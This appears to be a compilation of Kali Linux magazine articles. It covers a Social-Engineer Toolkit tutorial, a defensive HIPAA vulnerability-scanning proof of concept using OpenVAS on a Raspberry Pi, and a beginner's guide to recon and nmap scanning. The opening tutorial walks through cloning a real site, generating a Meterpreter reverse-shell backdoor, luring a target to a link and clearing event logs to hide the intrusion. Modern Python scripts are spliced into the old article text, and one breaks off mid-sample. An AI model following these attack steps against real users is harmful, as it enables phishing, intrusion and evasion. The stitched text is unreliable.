Figure 19. Generating Payload, Step 8



Select the option for 'Site Cloning', which will allow SET to clone the site that you define so that it can be used for the attack (Figure 16).

After pressing enter, the 'Web Template' screen will show the options for PORT/NAT or other settings. In the next step, enter the IP of your Kali Linux machine, so that the target makes a reverse connection to your machine when using the link you provide (Figure 17).

After that you provide the URL to be cloned, such as Yahoo, Twitter or Facebook. You can collect various information about the target (Figure 18).

Provide the URL to start cloning; once that's done, SET will start generating the 'payload' and some files such as the jar file and index.html (Figure 19).

Select the 'payload' that you want to generate. I'm using the second option, 'Windows Meterpreter Reverse_TCP', which will create shell access between the attacker and the target machine, that is, with my Kali Linux (Figure 20). It will display a list of encodings that will help you bypass the target's security. I prefer 'Backdoored Executable'; it is best at finding a 'spamhole' on the machine in question (Figure 21).

It will begin to generate multiple 'PowerShell code based injection' payloads on common ports such as 53, 80 and 443, from the attacker's machine to the target, using the one on which the 'payload' is generated.

Figure 20. Windows Meterpreter Reverse_TCP, Step 9

Figure 21. Backdoored Executable (BEST), Step 10

Figure 22. PowerShell, Step 11

Figure 23. Reverse TCP Connection, Step 12

Select option 16; it will ask for the 'Port Number'. Press Enter and it will use the default port number. It will launch the SET web server; once it has started, it will generate a link that you can pass on to the target, and once he uses that link his machine will create a 'Reverse TCP Connection' with the attacker's machine on the chosen port (Figure 23).

The 'PowerShell' code execution will run in the background, then load 'MSF' and generate a 'link' which, when a person clicks it, creates a reverse connection open to you within the network (Figure 24).

This provides a link; when the target tries to open it, all the information from their system comes back to us via a 'Reverse TCP Connection' (Figure 25). When someone tries to use this link, it will generate a 'TCP' connection on some port between the attacker and the target. After these procedures the 'payload' is generated, and when the link is used on the target machine to open the cloned page it also generates the '.jar' file, whose function is to establish the connection between the two machines (Figure 26).

Let's create a session with the machine; on my local machine I can check whether the connection was successful or not. We should use the 'netstat' command.

Example: netstat -ano | find "57804".

When we are connected to the target machine, we can run many programs and edit files.

Run 'Event Viewer' and remove all notifications, so it becomes more difficult to track what is happening with the machine.

We can also trace the established connection with the command "sessions -l".

After running the command, it will start sending 'HTTP packets' to the target machine via the 'GET method'.

This shows that the connection has been established with the machine.

You can use utilities such as Restart or Shutdown the system.

It is worth remembering that I wrote this article for educational purposes only; I am totally against cybercrime, so use it with conscience.



Figure 24. Starting the payload handler, Step 13

Figure 25. The attack, Step 14

Figure 26. Establish the connection, Step 15

Kali Scanning for HIPAA

A Proof of Concept: using Kali Linux to deploy distributed 
network vulnerability scanners for medical clients 

The Health Insurance Portability and Accountability Act of 1996 (HIPAA) requires organizations who handle electronic Protected Health Information (e-PHI) to take action and reduce risk relative to potential security breaches of digital communication and storage of patient information.



Open Source solutions can be leveraged as a low-cost and effective strategy to minimize risk when used as a component of a larger information security program. With a long "track" record of community support, Kali is an open source Linux distribution containing many security tools to meet the needs of HIPAA network vulnerability scans.

Note 

This article is not as much a how-to as it is a proof of concept and evaluation of Kali on low-cost hardware (Raspberry Pi in this case). As such, I will discuss my overall experiences here but will not get into the weeds of the build process for the scanner. There are much better resources elsewhere to explain the details of this particular project. In other words, I am not reinventing the wheel here and have borrowed heavily from readily available online resources. Think of this as more of a business case with some of the technical bits included.

As Senior Consultant for a Managed Service Provider company, I have a need to develop a scalable low-cost solution for performing HIPAA vulnerability scans. The scans will be part of a larger Information Security consulting service to assist clients with their HIPAA compliance program. As a Business Associate of Covered Entities (meaning a vendor of medical companies), the security solution will also be used to support the internal compliance program of our technology firm.

The requirement for risk analysis (and consequently vulnerability scans) is explained in the Guidance on Risk Analysis Requirements under the HIPAA Security Rule document published by the US Department of Health and Human Services (http://www.hhs.gov/ocr/privacy/hipaa/administrative/securityrule/rafinalguidancepdf.pdf):

Risk Analysis Requirements under the Security Rule. The Security Management Process standard in the Security Rule requires organizations to "[i]mplement policies and procedures to prevent, detect, contain, and correct security violations." (45 C.F.R. § 164.308(a)(1).) Risk analysis is one of four required implementation specifications that provide instructions to implement the Security Management Process standard. Section 164.308(a)(1)(ii)(A) states: RISK ANALYSIS (Required).

Conduct an accurate and thorough assessment of the potential risks and vulnerabilities to the confidentiality, integrity, and availability of electronic protected health information held by the [organization].

...Vulnerability is defined in NIST Special Publication (SP) 800-30 as "[a] flaw or weakness in system security procedures, design, implementation, or internal controls that could be exercised (accidentally triggered or intentionally exploited) and result in a security breach or a violation of the system's security policy." Vulnerabilities, whether accidentally triggered or intentionally exploited, could potentially result in a security incident, such as inappropriate access to or disclosure of e-PHI. Vulnerabilities may be grouped into two general categories, technical and non-technical. Non-technical vulnerabilities may include ineffective or non-existent policies, procedures, standards or guidelines. Technical vulnerabilities may include: holes, flaws or weaknesses in the development of information systems; or incorrectly implemented and/or configured information systems.

Project Requirements 

A build versus buy approach was taken to evaluate solutions as a scalable, affordable, and effective method of conducting network vulnerability scans. The result of the scans will address HIPAA risk analysis requirements while driving vulnerability remediation plans. The final solution must scale with growing business demands for security assessments, so automation of distributed scanners was a primary consideration. Additionally, the scanners must be cost-effective to deploy, easy to manage (more on this later), and enable centralized reporting.

Having familiarity with the Backtrack Linux distribution, Kali was a logical choice for a best of breed offering in the open source community. So what is Kali Linux? According to Kali.org, Kali Linux is an advanced Penetration Testing and Security Auditing Linux distribution. It is also a complete rebuild of Backtrack, its predecessor. Kali is free (as in beer) and contains over 300 penetration testing tools. This seems like a good fit for the low-cost requirement of the project.

To further control costs, the Raspberry Pi system on a chip (SoC) device was selected as the computer hardware for the scanners. These tiny computers can be purchased from a number of distributors for $35.00 USD. It must be recognized at this point that choosing a low-powered device like the RPi is not without trade-offs. We are seeking to balance cost, size, and power efficiency against performance requirements and capabilities of the system. That being said, it's hard to argue that a better value can be had for a distributed network scanner.

What's a Raspberry Pi? 

According to the official website (http://www.raspberrypi.org/faqs), "the Raspberry Pi is a credit-card sized computer that plugs into your TV and a keyboard. It's a capable little PC which can be used for many of the things that your desktop PC does, like spreadsheets, word-processing and games. It also plays high-definition video. We want to see it being used by kids all over the world to learn programming." Hardware Specifications (Raspberry Pi Model B):

• CPU - 700 MHz ARM processor (overclocks to 1 GHz)
• Storage - SD card slot
• Memory - 512MB RAM
• Graphics - Broadcom VideoCore IV
• Video Out - Composite RCA and HDMI
• Audio Out - 3.5mm jack
• Networking - 10/100Mbps Ethernet
• I/O Ports - 2x USB




Figure 1. Raspberry Pi Model B 

Designed as a project computer, the Raspberry Pi appeared to be a good fit for our specific requirements. I followed the documentation on Kali.org for installing Kali ARM on a Raspberry Pi. Since this is a proof of concept, an 8GB SDHC Class 10 card was used for provisioning the operating system. A production system may require more storage for running multiple reporting tools and keeping a local copy of the scanning history.

Some Notes on Installation 

Kali image used for testing: http://cdimage.kali.org/kali-linux-1.0-armel-raspberrypi.img.gz.

While this is not a Kali/Raspberry Pi installation how-to, I figured I would at least touch on the unexpected problems encountered during the initial set up process. It is often said that installing open source systems is not for the faint of heart. I agree. While not always straightforward, a bit of Google-fu usually saves the day... no exceptions here.

Note 

I experienced problems with the kali-linux-1.0.4-armel-rpi.img.gz version of the operating system (the current version) which resulted in the keyboard and mouse locking up in the desktop interface. Troubleshooting this issue led me to forum posts discussing the same symptoms and of successful attempts using version 1.0, then applying updates from there. This is the path I took in order to make progress on the task at hand.

Some initial hardware problems were experienced due to drawing too much power from the USB ports. For example, my Apple USB keyboard was detected by the operating system, but would not work. This was resolved by using a powered USB hub to offload the power draw. Trying a different keyboard worked fine without the hub, so your mileage will vary. This is only of concern when initially configuring the RPi. A mouse and keyboard will not be used when the device is running on the client's network. If you need the hub during production, the Raspberry Pi can be powered off of the same USB hub adding additional power to the mouse/keyboard. This is how I ran the device during my testing and eliminated the need for an additional power supply.

Also, the default install does not fully utilize the SD card, which led to errors due to a full disk when performing updates. This was resolved by using the fdisk followed by the resize2fs utilities to expand the system partition to use the remaining free space. Exact details for this can be found here: http://raspberrypi.stackexchange.com/questions/499/how-can-i-resize-my-root-partition.

Based on my experience here, some other software housekeeping items are needed (Listing 1)...

Listing 1. General Kali updates

# apt-get update                          (performs general software updates)
# apt-get install xfce4 xfce4-goodies     (installs items needed to support the X server GUI)
# apt-get install iceweasel               (installs the default browser)



With the initial hiccups of the installation behind me, the next step was to consider what tools from the new Kali system would be deployed to perform the network vulnerability scans. With so many capabilities packed into this Linux security distro, there was no shortage of options.

Running startx from the command prompt cranks up the desktop interface. Even if we will not normally run our scripts and programs from the GUI, it is helpful to drive the system around a bit to familiarize ourselves with the tools loaded on the Kali platform. Be prepared to grab a cup of coffee when first starting the graphic interface. The slower processing power of the Raspberry box takes a few minutes to load the desktop the first time. Patience is rewarded with the familiar Kali/Backtrack dragon logo.



Selecting a Scanner 

With over 300 security tools available on the Kali system, we must narrow down which tool (or tools) to use for our purposes. Here are some of the requirements:

• Scheduled scans for multiple clients,
• flexibility in configuration,
• available (free) updates to vulnerability definitions,
• multiple options for reporting output,
• secure transmission of reports (more on this to follow).

Let's examine these requirements a bit more. Since the concept here is to create a set of distributed scanners at various client sites, the system must be able to run as a scheduled task and will ultimately be called from a master script. Having flexibility with its configuration, the software should adapt well to changes in solution requirements over time. Freely available vulnerability definition updates will keep costs down while allowing the system to detect ever-evolving system threats. The tool should provide multiple options for reporting output. Initially reports will be generated in basic HTML or PDF formats, but future requirements will necessitate capturing granular scanning data for developing a more sophisticated (eventual) self-service customer portal. From a security standpoint, we are not storing ePHI; however, we are storing information sensitive to the internal structure and systems of our clients' networks. As such, precautions to secure transmission of reports will be established as part of the solution. For the reasons described above, I selected OpenVAS as the scanning tool for this proof of concept. No one system will be one hundred percent effective all of the time. Certain vulnerabilities will be missed while some false-positives may be reported. Remember - risk "reduction" is the goal as risk "elimination" is an unreasonable expectation. The important thing is we are using the tool as part of an overall security effort. A more attractive option would be to deploy multiple scanning tools to validate the results and cover gaps that exist from a single software solution. For the purposes of this phase of the project, we will stick to using a single tool for scanning and reporting.

Working with OpenVAS 

I ran my out-of-the-box OpenVAS install from the desktop and fired up the setup script included with the GUI menu options. After several attempts to configure and run scans with no luck, I decided to pursue a different course of action. While searching for set-up guides, I came across an invaluable tool: the openvas-check-setup script. While time-consuming, the script checks out all parts of the OpenVAS system and updates as necessary. I had to do the following based on the fixes recommended by the script: Listing 2 and Figure 2.

Hakin9 Extra 03/2013

Listing 2. Initial updating of OpenVAS

# apt-get install openvas-scanner   (this updated the scanner and a good number of other components of the system)
# openvasmd --migrate               (upgrades the database)
# openvas-scapdata-sync             (update SCAP feed)
# openvas-certdata-sync             (update CERT feed)
# openvassd                         (starts the OpenVAS Server)
# openvasmd                         (starts the OpenVAS Manager)
# openvasad                         (starts the OpenVAS Administrator)
# gsad                              (starts the Greenbone Security Assistant)



OK: OpenVAS Manager client certificate is present as /var/lib/openvas/CA/clientcert.pem.
OK: OpenVAS Manager database found in /var/lib/openvas/mgr/tasks.db.
OK: Access rights for the OpenVAS Manager database are correct.

Figure 2. Migrating the database

After performing the above, I still got an error stating "ERROR: OpenVAS Manager is NOT running!" To double-check for listening services, I ran the command: netstat -A inet -ntlp. As the OpenVAS Manager (openvasmd) was found to be listening on its default port, I ignored the "error" and proceeded with testing (Figure 3).

Figure 3. Checking listening ports for the openvasmd service
Setting up the Scans 

The obligatory disclaimer: I am not an attorney; however, I used to work for some. Be sure you have express written permission to perform any penetration tests, vulnerability scans, or enumeration of network services and host information. Conducting security scans without permission is against the law and not advocated here. For testing purposes, I have used my home network and my employer's network (with permission) to run the scans. Enough said about that.

Setting up a scan is simply a matter of managing (at a minimum): Tasks, Targets, and Scan Configs.

Tasks - scan jobs made up of the other elements. The tasks can be scheduled and leverage Escalators, such as sending an email when the task is complete.

Targets - IP addresses or ranges of the network devices to scan. This can be a single Target configuration for a simple network or multiple (servers, workstations, network devices). Multiple targets would be useful when it is desirable to customize the level of scanning based on different device types.

Scan Configs - preset vulnerability scan configurations using different levels of scanning techniques. As the more intrusive configs can bring down hosts, use caution when making decisions on how and when to run the scans.

For this exercise, I set up three separate scan targets - our workstation network, our server network, and one for my work computer. I then created three tasks to scan the targets, named "Scan workstations - Full and fast", "Scan servers - Full and fast", and "Scan my PC" respectively. For each of these I used the Full and Fast scan option. This was the least invasive of the default set of scan configurations. The overall process is straightforward as the Greenbone Security Desktop interface is intuitive in its layout. Several tabs at the bottom of the application window delineate the various areas for configuration.

I chose to run the scans manually and did not schedule them. The time required to perform the scans will vary based on the number of hosts being scanned in the current task and the performance of the scanner and network. Just to get an idea of the traffic generated during a scan, I ran Wireshark on my laptop to watch the vulnerability scans. Further analysis of the packets would reveal the magic behind the scanning process (Figure 4).

Hardware Performance 

Let's suffice it to say, the performance of the Raspberry Pi is underwhelming in this application. This is not unexpected actually and, to a certain degree, insignificant. While the speed of the scans could be increased by using faster hardware, we desire inexpensive and good enough. While scanning, the processor hovered around seventy percent utilization. Further performance gains would be realized by running OpenVAS from the command line only and not from the GUI. In a distributed scanner model, the desktop interface would only be used on the reporting server. In a real-world application, I would choose to spend a little more on a significantly faster device (and still stay below $100 per scanner). Some attractive RPi alternatives for the ARM processor platform include the Beagle Bone Black and the Odroid U2.

Analyzing the Results 

Once the scan(s) were finished, it was time to evaluate the results. In this case, we will look at a scan on my work laptop (a Windows 7 computer). I used the HTML version of the report although there are other options including XML, PDF and text.

The Host Summary area of the report provides a high-level view of the number of vulnerabilities detected and the threat level - High, Medium, or Low. Since I used the Full and Fast scanning option, I assumed the threat count would be fairly low. More invasive scans would likely show more threats at the expense of time and higher network activity. For the test scan, the results show zero High level threats, two Medium and seven Low level. A port summary of the detected threats is shown in Figure 5.

Let's take a look at one of the Medium level threats. The same process will be used to examine each threat to determine a remediation plan for the client. One of the threats detected is called "NVT: DCE Services Enumeration" on TCP port 135. A bit of research on the threat shows Windows computers use this port to look up various services running on a remote computer and it is used for remote management of the device. The recommendation from the OpenVAS report is to "filter incoming traffic to this port".

Host Summary table (columns: Host, Start, End, High, Medium, Low, Log, False Positives)

Figure 5. OpenVAS HTML Report, Summary Section

A potential remediation could be to modify the firewall rules on the Windows computer to only allow IP packets sourcing from servers and administrative workstations. This would reduce the attack vector by blocking connections from peer Windows clients on the network (which have no need to communicate directly to the device). A comprehensive remediation plan would use a similar approach to analyze each threat identified by the scan. The process of scanning and remediating identified problems will result in an overall risk reduction with respect to our clients' network security (Figure 6).
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Figure 6. Openl//AS HIM/. Report, Security Issues 

Centralized Reporting 

OpenVAS is designed to leverage remote slave 
scanners. This allows for the Greenbone Security 
Desktop and the underlying OpenVAS components 
to perform the heavy lifting of the remote scanning. 
The advantage of this capability is using a single in- 
terface for scheduling scans and reporting. A cen- 
tralized OpenVAS server can be used to manage 
the entire system. The distributed aspect of the solu- 
tion will allow my security consulting service to scale 
efficiently without unneeded visits to client sites. 
With direct access to all client reports, I can work di- 
rectly with our managed services team to implement 
the remediations. While certainly a great feature, the 
problem with the solution is requiring multiple VPN 
connections into the networks of our medical clients. 
This risk can be mitigated by using a DMZ for the 
OpenVAS master server and scheduling the scans 
in a way where only one client VPN connection is re- 
quired at a time. Leveraging on-demand VPN con- 
nections in conjunction with an idle timeout would be 
the best configuration to eliminate these concerns. 
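The report walk-through above and the centralized reporting idea come down to the same task: turning OpenVAS output from several client sites into one threat count per host and one per-port list to drive remediation decisions. The script below is an added example, not code from the article or from the OpenVAS project. It assumes the XML export of an OpenVAS report, in which each finding is a <result> element with <host>, <port>, <threat> and <name> children; the two client reports it parses are constructed sample data, not real scan output. 

```python
"""Summarize OpenVAS XML reports from several clients into one remediation view.

Added example (not from the article or from OpenVAS). Assumes the XML report
export, where each finding is a <result> with <host>, <port>, <threat> and
<name> children. The sample reports below are constructed for the demo.
"""
import xml.etree.ElementTree as ET
from collections import Counter, defaultdict

# Constructed sample reports, one per client site; not real scan data.
SAMPLE_REPORTS = {
    "clinic-a": """<report>
  <results>
    <result><host>192.0.2.10</host><port>135/tcp</port><threat>Medium</threat>
      <name>DCE Services Enumeration</name></result>
    <result><host>192.0.2.10</host><port>445/tcp</port><threat>Medium</threat>
      <name>SMB Null Session</name></result>
    <result><host>192.0.2.10</host><port>general/icmp</port><threat>Low</threat>
      <name>ICMP Timestamp Detection</name></result>
    <result><host>192.0.2.10</host><port>general/tcp</port><threat>Log</threat>
      <name>OS Detection</name></result>
  </results>
</report>""",
    "clinic-b": """<report>
  <results>
    <result><host>198.51.100.7</host><port>3389/tcp</port><threat>High</threat>
      <name>RDP Weak Encryption</name></result>
    <result><host>198.51.100.7</host><port>135/tcp</port><threat>Medium</threat>
      <name>DCE Services Enumeration</name></result>
  </results>
</report>""",
}

# Ordered worst to least severe; used both for counting and for the cutoff.
THREAT_LEVELS = ("High", "Medium", "Low", "Log")


def parse_report(xml_text):
    """Return the findings of one report as (host, port, threat, name) tuples."""
    root = ET.fromstring(xml_text)
    findings = []
    for r in root.iter("result"):
        findings.append((
            r.findtext("host", "").strip(),
            r.findtext("port", "").strip(),
            r.findtext("threat", "").strip(),
            r.findtext("name", "").strip(),
        ))
    return findings


def host_summary(findings):
    """Count findings per threat level, like the report's Host Summary table."""
    counts = Counter(f[2] for f in findings)
    return {level: counts.get(level, 0) for level in THREAT_LEVELS}


def port_summary(findings, min_level="Medium"):
    """Group findings at or above min_level by port: the per-port view used
    to decide which ports to filter at the host firewall."""
    cutoff = THREAT_LEVELS.index(min_level)
    by_port = defaultdict(list)
    for host, port, threat, name in findings:
        if threat in THREAT_LEVELS and THREAT_LEVELS.index(threat) <= cutoff:
            by_port[port].append((host, threat, name))
    return dict(by_port)


def centralized_summary(reports):
    """One view over every client's report, worst client first."""
    rows = [(client, host_summary(parse_report(xml)))
            for client, xml in reports.items()]
    # Sort by (High, Medium, Low, Log) descending.
    rows.sort(key=lambda r: tuple(-r[1][lvl] for lvl in THREAT_LEVELS))
    return rows


if __name__ == "__main__":
    for client, counts in centralized_summary(SAMPLE_REPORTS):
        print(client, counts)
    for port, items in sorted(port_summary(parse_report(SAMPLE_REPORTS["clinic-a"])).items()):
        print(port, items)
```

Run as a script it prints the per-client counts in severity order and, for clinic-a, the Medium-and-above findings grouped by port; the 135/tcp group is the entry that leads to the "filter incoming traffic to this port" decision discussed above, and a master server holding every client's report can run the same summary over all of them at once. 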

Note 

Due to the timeline for writing this article, the remote 
scanning capability of OpenVAS was not tested. 

Future Enhancements 

As with any project like this, there is always room 
for improvement. Future requirements to increase 
remote system capabilities will likely push beyond 
the limits of the Raspberry Pi hardware. In that 
case, other slightly more expensive hardware so- 
lutions could be considered without completely re- 
inventing the wheel. For example, many other SoC 
systems are on the market with higher processor 
speeds and more memory than the RPi. As these 
devices use the same processor family as RPi, it 
is expected Kali ARM support will enable use of 
these more capable hardware systems. Some like- 
ly future enhancements include: 

• packet captures of Internet traffic to keep a roll- 
ing history of network activity in the event of a 
breach, 



• leverage additional scanning tools to validate 
OpenVAS scans, 

• harden the Kali install to protect locally stored 
vulnerability reports, 

• deploy a client self-service portal to view a his- 
tory of scans and vulnerability remediation. 

Summary 

This project started as a proof of concept to deter- 
mine the viability of using open source tools like Kali 
to deploy distributed network vulnerability scanners 
on low-cost hardware. The business case for this so- 
lution is to provide value-added consulting services 
to our medical clients and reduce risk as part of a 
comprehensive HIPAA compliance program. The ex- 
periences outlined here demonstrate that Raspber- 
ry Pi and Kali make an effective hardware/software 
platform for network scans. As is to be expected with 
an open source project, more effort and technical 
knowledge is required to deploy (and maintain) the 
solution; however, the long-term return on investment 
makes the endeavor worthwhile. The end goal is to 
have a completely automated and low-cost scanning 
solution where all parties have direct access to the 
reports for compliance and remediation purposes. 
This proof of concept using Kali shows that the end 
goal is certainly within reach. 

HIPAA Terms 

Covered Entity - a healthcare provider, a health 
plan, or healthcare clearinghouse. 

Business Associate - a person or entity that per- 
forms certain functions or activities that involve the 
use or disclosure of protected health information on 
behalf of, or provides services to, a covered entity. 

Electronic Protected Health Information (e-PHI) 
- individually identifiable health information is 
that which can be linked to a particular person. 
Common identifiers of health information include 
names, social security numbers, addresses, and 
birth dates. 
KALI LINUX 

A Solution to HACKING/SECURITY 

Today is the world of technology and everyone is somehow 
attached to it. Some use technology for good purposes and 
some for bad ones, and the Internet is the technology that 
best illustrates both statements: it is used both by the good 
(the White Hats) and the bad (the Black Hats). So, my paper 
is based on the premise that the OS (Operating System) KALI 
LINUX (which is an extension of Backtrack) can be used in 
both ways, for good things or for bad things. 



In the depth of crisis, hacking over the Internet 
is still a very big problem, because technology is 
advancing day by day and everyone here is out to 
earn money. Some earn money through bad methods 
and some through good ones. So, as a hacker, I don't 
support people earning money with bad methodologies. 
Now, with the depth of hacking, some big companies 
on the Internet like Facebook, Google, Firefox and 
many more have opened up bug bounty schemes in 
which hackers from all over the world are invited to 
find a bug or vulnerability in their services; if one is 
found, they pay high bounties for the hard and smart 
work. To find those bugs, hackers have to use 
methodologies based either on the command line or on 
GUI interfaces. Therefore, in order to fulfill this demand, 
another operating system called Kali Linux came onto 
the market, which is an extension of Backtrack. Kali 
Linux is very helpful for penetration testing and 
vulnerability assessment. I am going to show the 
various tools that can be used for penetration testing 
and also for attacking. This guide on Kali Linux will 
describe both parts. 

Now, before moving on to the real demonstrations, 
let's go through some definitions and terminology 
so that there is no confusion while performing the 
steps. 



What is Kali Linux and what is its use? 

This question must come to mind: what is Kali Linux? 
Let me clear up the concept: Kali Linux is a complete 
rebuild of the Backtrack Linux distribution, based on 
the Debian platform. Kali Linux is an advanced OS 
used for penetration testing and security auditing. It 
is also open source and freely available on the 
Internet, so anyone can download it. 

Features of Kali Linux 

Some of the features that make Kali more compatible 
and useful than other Linux distributions: 

• Kali Linux comes with 300+ penetration testing 
tools, which are enough to audit any OS, any 
website or web app. 

• Much more powerful and faster than Backtrack. 

• Many tools that did not work in Backtrack have 
been eliminated in Kali. 

• Open source and freely available on the Internet. 

• Kali Linux is much more compatible with wireless 
devices. 

• Comes packaged in multiple languages so that 
every person can carry out assessments in their 
own language. 

• The packages included in Kali Linux are signed 
by each individual developer (GPG signatures). 

• It includes the latest injection patches, which help 
pentesters do assessments using the various 
wireless techniques. 

• And many more. 

Let us have a close look at Kali now. 

A survey of Kali Linux 

The outer look of Kali is pretty different from other 
Linux distributions like Backtrack. The default 
username and password to enter Kali are the same 
as those of Backtrack: username root and password 
toor (Figure 1). 

Figure 1. The login panel of Kali 



This is exactly how Kali looks when you enter the 
main desktop; you can ignore the folders. This is my 
Kali installed in a virtual machine, and I am not wasting 
time on the installation process because people are 
smart enough to carry out the installation of any 
operating system. So, let's focus on our main task. 
Look at the top-right corner of the window: it shows 
who is currently logged into your system (Figure 2). 

Moving on, the very first task when you enter Kali is 
to check whether the Internet connection is working 
or not. In the snapshot below, look at the cursor at the 
top right corner showing the wired network, which 
means the Internet is working fine in the virtual 
machine with NAT enabled (Figure 3). 

Now let's get familiar with the terminal. In Windows 
there is a command prompt from which the whole 
system can be accessed; in Linux there is something 
called the terminal, based on a command-line 
interface, from which the whole system can be viewed. 
To open the terminal just follow the path "Applications 
> Accessories > Terminal", and from there you can 
simply copy the terminal to the desktop like I did, so 
that the user doesn't have to go there every time; he 
just clicks the terminal icon to access it (Figure 4). 




Figure 2. The desktop 



Figure 4. Showing the path to open the terminal 




Figure 3. Showing the Internet connectivity 
And this is how the terminal looks (Figure 5). 

Now let's get our hands dirty by running some 
commands in the terminal and get friendly with Linux. 

Some of the important commands which will help 
the user get friendly with Kali: 

• In order to run a service in Linux, just run 
service <name> start. For instance, to start the 
apache2 service for my local host I type "service 
apache2 start" (Figure 6). To check whether the 
service has started successfully, start your Internet 
browser and enter "127.0.0.1", the loopback 
address; the page shown confirms the Apache 
server is working (Figure 7). 

• In order to open the Internet browser from the 
terminal, just enter "firefox &": it opens the browser 
and also shows the PID (process ID) allocated to 
the browser process (Figure 8). 

• If root wants to change the password of his 
account, he can simply do it by entering the 
command "passwd" and typing the new password; 
this changes the password from the default "toor" 
to, say, "123" (Figure 9). 

Figure 6. Starting the apache2 service 

Figure 7. Apache is successfully running 

Figure 8. Opening the Firefox browser 

So far we have seen some of the important 
commands which make a user friendly with the 
Linux terminal. Some more commands which are 
very helpful for any user getting started with Linux: 

• ls - list the files and folders of the current 
directory 

• cd - change directory 

• touch - create a file 

• mkdir - create a directory 

• rm - removes files; rm -R removes files and 
directories 

• rmdir - removes empty directories 

• man - open the manual page for a command 

• time - to see the current time 

• date - shows the current date 

• nano - another editor for creating and editing 
files. 

Figure 9. Changing the root default password 

Figure 10. Exploring the tools 

These are some of the most important commands 
which will help any user in the further process. Now 
let us get back to our main motive, but first let me 
make everyone familiar with some of the terminology 
which will help everyone understand the basic 
concepts behind the scenes. 

In order to begin with any kind of hacking, every 
person has to go through some phases, which are 
known as the hacking phases: 

Steps Performed by Hackers 

There are only five steps in order to hack anything 
in this world: 

• Information Gathering 

• Scanning 

• Gaining Access 

• Maintaining Access 

• Covering Tracks 

In order to explore these hacking steps, let's first 
check where all the tools can be accessed in the 
GUI (Figure 10). 

There are more than 300 tools in Kali Linux which 
help with acquiring remote systems, generating your 
own payloads, adding the latest exploits, the scanning 
process and much more. It is not possible for me to 
explore each and every tool in the list, so what I am 
going to do here is stick to the main concept and show 
the main tools, which will make a person familiar with 
Kali and also free them to use the other tools on 
their own. 

Information Gathering 

This is the very first step: gathering each and every 
piece of information about the target, because only 
then can a tester examine the whole bunch of 
vulnerabilities and patch them easily and safely. The 
major source for gathering information is Google, 
which is open and available to everyone. Information 
gathering is divided into: 

• Active gathering - the user interacts with the target 
directly. For instance, making a phone call to a 
friend working in the target company and gathering 
the information by spoofing your own friend. 

• Passive gathering - the user does not interact 
directly with the target, for example collecting 
information from search engines like Google or 
Bing (Figure 11). 

Now the main task is to gather the IP (Internet 
Protocol) address, a 32-bit unique number assigned 
to every host. The simplest method is to ping a 
website and read the IP address from the reply. 
Although ping is meant for checking whether a host 
is alive or not, here we stick to our own method. So, 
if your target is a website, simply ping <website name> 
and copy the IP address (Figure 12). 

Figure 11. Gathering information from Google 

Figure 12. Acquiring the IP address of a particular website 

Figure 13. Options in Dmitry 

The next information to gather is: 

• reverse lookup 

• DNS information 

• IP address 

• and type of target 

In Kali there is a single tool which can give you all 
these results, so you don't have to go to a website 
on the Internet every time and start searching. The 
tool I am using here is "dmitry", which is completely 
command-line based but very easy to use and gives 
results fast and accurately. 

To use dmitry, simply run the following command 
(Figure 13-15): 

dmitry -winsepfb -t 0-9 -e IP 

In this particular scan I have targeted Google, and 
the scan results show that all 150 ports are in a 
closed state. You can use as many of the options 
as you want. 



Scanning 

The second most important phase is to find the 
services that are vulnerable, the open ports, and the 
many other kinds of vulnerable services in Windows, 
websites, routers, networks etc. Scanning is broadly 
divided into three major parts: 

• Port scanning: the attacker sends a number of 
probe messages to the computer in order to learn 
which ports and services are reachable on it. 

• Network scanning: to check the number of active 
hosts on the network. 

• Vulnerability scanning: to check for weaknesses 
in the target so that an attacker could use them to 
gain access to the target. 

So now I am going to use the universal vulnerability 
scanner which gives the best output for the scanning 
process and is open source, freely available on the 
Internet: nmap, which is responsible for OS 
fingerprinting, service fingerprinting and numerous 
TCP scans, stealth scans, UDP scans, port scans 
and many more. 




Figure 14. Running Dmitry against Google 

Figure 15. Results of the Dmitry scan 

Figure 16. Invoking nmap in the terminal 

Figure 17. TCP scans 

Step 1 

Invoke nmap by running the command "nmap" 
(Figure 16). 

Step 2 

Check for a TCP scan. Command used is: nmap -sT 
IPaddress (Figure 17). 



Exploitation 

Gaining access, or exploitation, means taking over a 
computer system, the control panel of a website or a 
network without permission. In this phase the attacker 
attacks the systems to gain access and steals the 
important information of the company he wants to 
exploit. The exploit can occur on a LAN (Local Area 
Network), on a WAN (Wide Area Network), and it can 
also occur offline, as in reverse engineering, buffer 
overflow attacks, password filtering etc. 

In this particular phase I am going to exploit my own 
WIN-7 machine just to show how exploitation can be 
done through Kali Linux much faster than with 
Backtrack. 

Before going deep into the exploitation, let me clear 
up some basic terminology so that there is no 
confusion while going through the attacking phase. 

• Threat: a threat is a potential violation of security. 

• Vulnerability: a weakness in the design of an 
application or website that can lead to 
compromising the security of the system, the 
network or a web-based application. 

• Attack: an action taken to violate the security of 
a system. 

• Exploit: to breach the security of an IT (Information 
Technology) system through a vulnerability. 

• Payload: in computer security, payloads are 
malicious files (generally .exe) which perform 
malicious activity. 

• Reverse TCP connection: a reverse connection is 
made to bypass the restrictions that a firewall 
applies to open ports. A firewall blocks incoming 
traffic to ports but typically does not block outgoing 
traffic, so the attacker uses an outbound connection 
from the victim to bypass the security restrictions. 
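From the defender's side, both the TCP connect scan from the Scanning section and the reverse TCP callback described in the last definition above leave marks in ordinary firewall logs. The script below is an added example, not code from the article or from nmap or Metasploit. It assumes a simple one-line-per-decision log format (timestamp, direction, action, src:port -> dst:port), an egress policy that allows only ports 53, 80 and 443, and constructed addresses and log lines for the demo. It flags a source that touches many distinct ports on one host within a few seconds (what a connect scan looks like in the log) and any outbound connection to a port outside the egress allow-list (where a callback to port 4444 would surface). 

```python
"""Spot a TCP connect scan and off-policy outbound connections in firewall logs.

Added example, not from the article. Assumes a constructed log format:
"<timestamp> <IN|OUT> <ALLOW|DENY> <src>:<sport> -> <dst>:<dport>".
Addresses, ports and the egress policy below are assumptions for the demo.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log. The first eleven lines are one source probing many
# ports in three seconds (a connect scan); the OUT lines include one outbound
# connection to port 4444, the listener port used by the handler above.
SAMPLE_LOG = """\
2013-09-01T10:00:00 IN DENY 203.0.113.5:40001 -> 192.0.2.10:21
2013-09-01T10:00:00 IN DENY 203.0.113.5:40002 -> 192.0.2.10:22
2013-09-01T10:00:01 IN DENY 203.0.113.5:40003 -> 192.0.2.10:23
2013-09-01T10:00:01 IN DENY 203.0.113.5:40004 -> 192.0.2.10:25
2013-09-01T10:00:01 IN ALLOW 203.0.113.5:40005 -> 192.0.2.10:80
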